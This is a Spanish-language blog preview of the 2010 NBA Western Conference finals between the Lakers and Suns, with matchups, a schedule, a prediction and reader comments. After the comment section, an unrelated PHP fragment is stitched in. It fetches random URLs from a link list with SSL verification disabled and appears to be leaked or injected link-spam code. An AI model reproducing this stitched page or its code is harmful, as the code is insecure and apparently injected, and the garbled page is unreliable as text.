Análisis Los Angeles Lakers vs Phoenix Suns

15 de May de 2010 por MagicJohnson32

Regular: 3-1 Lakers

Lakers: 101.7 p. favor (12º) – 97 p. contra (9º)
Suns: 110.2 p. favor (1º) – 105.3 p. contra (27º)

kbuzzerLa espera se ha hecho eterna pero las finales de la Conferencia Oeste ya llegan. En ellas Suns y Lakers volverán a encontrarse en una eliminatoria de Playoffs, la primera que enfrentará a ambos equipos desde las victorias de Phoenix en primera ronda en los años 2006 (4-3) y 2007 (4-1).  Los Lakers tienen, por tanto, ciertas cuentas pendientes, pese a que aquellas derrotas tienen buena parte de la culpa de lo que sucedió a partir de ahí (la historia es conocida: Kobe exige movimientos, meses después llega Gasol, los Lakers alcanzan las Finales en 2008 y se proclaman campeones en 2009).

Bien pensado, posiblemente los Suns tengan más motivos para buscar ‘venganza’, ya que la incorporación de Gasol a los Lakers precipitó, a su vez, uno de los mayores errores cometidos por la franquicia de Arizona: la adquisición de Shaquille O’Neal.

nashkbYa sin aquella losa, de vuelta al desenfreno ofensivo made in D’Antoni pero con Alvin Gentry en el banquillo, los Suns han recobrado la sonrisa cuando a su alrededor había poco más que sospechas. Sospechábamos que a Nash no le aguantarían las piernas, y vaya si le aguantan. Sospechábamos que Amaré no acabaría la temporada en Phoenix, y vaya si lo ha hecho. Sospechábamos que la defensa de los Suns sería terrible, sin Raja Bell ni Marion ni nadie capaz de defender, y resulta que, bueno, no está siendo tan terrible.

Pese a todo, seguimos sospechando. Los Suns apenas han sido rival para los Lakers últimamente, incapaces de descifrar cómo jugarle a un equipo que alinea a dos 7 ft., y con un grave problema en el amarepauemparejamiento Jason Richardson vs Kobe Bryant, todavía más desequilibrado sobre el parquet de lo que lo está sobre el papel.

Sucede, sin embargo, que los Suns no son los mismos. O como mínimo  no lo parecen. Ambos equipos  llegan en su mejor momento de la temporada, tras haber despachado por la vía rápida sus respectivos compromisos de semifinales de conferencia. Tanto los angelinos frente a los Jazz como los de Arizona ante los Spurs se han comportado con una regularidad prodigiosa en ataque, y a unos niveles casi idénticos (109,5 puntos por partido los Suns, 109,25 los Lakers) y prometen una serie preciosa que seguiremos con detalle en TJNBA.

nashamareclapClaves de la eliminatoria:

– Centímetros contra velocidad: Phil Jackson insiste, cada vez que juega contra los Suns, en buscar continuamente a los pívots (incluso cuando eso implicaba buscar a Kwame Brown) y el plan en esta ocasión es nutrir a Bynum y Gasol. Los Suns necesitan, por tanto, un ritmo eléctrico, en el que mejor rinden Nash y Stoudemire, y que neutralice al menos en parte el juego interior angelino. Visto el estado de forma de Pau, es de prever que haga estragos.

– El nuevo marrón de Fisher: Sufrió ante Westbrook, mejoró ante Deron y, tras demostrar una vez más, la enésima, que nunca hay que dudar de él, ahora le corresponde defender al gran Nash. Derek Fisher tendrá problemas, seguro, cada vez que Nash y Amaré jueguen el pick & roll pero asumirá responsabilidades, como siempre ha nashfishhecho. Puede que alguno de los partidos, tal vez la serie, se decidan de la mano de Mr 0.4.

– Richardson vs Kobe: No se trata de que J-Rich supere a Bryant. Nadie puede pedirle eso. Pero sí algo más que los 8.8 puntos con apenas un 31% de acierto que ha promediado en los cuatro enfrentamientos entre ambos equipos esta pasada regular season. Más allá de los números, la función de Richardson ha de ser la de dar trabajo a Bryant.

– Los banquillos: Dudley, Frye (que vuelve al banco debido a la recuperación de Robin Lopez), Barbosa y Dragic han protagonizado durante los Playoffs algunas buenas actuaciones. Su aportación ha de ser netamente superior a la que ofrezcan Odom, Brown y Farmar, únicos jugadores de banquillo con una cantidad significativa de minutos.

Agenda:
– P1: Lunes, 17 de mayo a las 3h00 (Hora española)
– P2: Miércoles, 19 de mayo a las 3h00
-P3: Domingo, 23 de mayo a las 2h30
-P4: Martes, 25 de mayo a las 3h00
-P5: Jueves, 27 de mayo a las 3h00
-P6: Sábado, 29 de mayo a las 2h30
– P7: Lunes, 31 de mayo a las 3h00

Pronóstico: 4-1, Lakers.

Comenta

4 comentarios a esta entrada

  1. Viva_Dirk dice:
    #1

    Creo que los Lakers son favoritos sin duda, pero aun menos dudas tengo de que Phoenix tiene muchas ganas de callar bocas y que sobre todo sus veteranos van a vender carísima su derrota.

    Va a ser una serie muy atractiva para el espectador, y espero que la del Este también.

      Citar

  2. MagicJohnson32 dice:
    #2

    Habrá que ver cuál es el ritmo de juego. Los Suns tienen opciones si controlan el rebote defensivo y roban muchos balones. Los Lakers necesitan un ritmo más o menos pausado, con el mayor número posible de posesiones en estático, y controlar los triples de los Suns, algo que hicieron bien en regular.

    ¡Qué ganas de que empiece!

      Citar

  3. Tobal dice:
    #3

    Los Suns son un buen equipo ofensivo,creo que si quieren ganar esta eliminatoria,tendran que dominar el rebote,salir al contraataque y tirar bien desle la linea de tres puntos,además de controlar un poco a Kobe Bryant .

      Citar

  4. FABRI dice:
    #4

    LOS SUNS NO TIENEN CHANSE QUIEN VA A PARAR A KOBE??? NI CHANSES

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>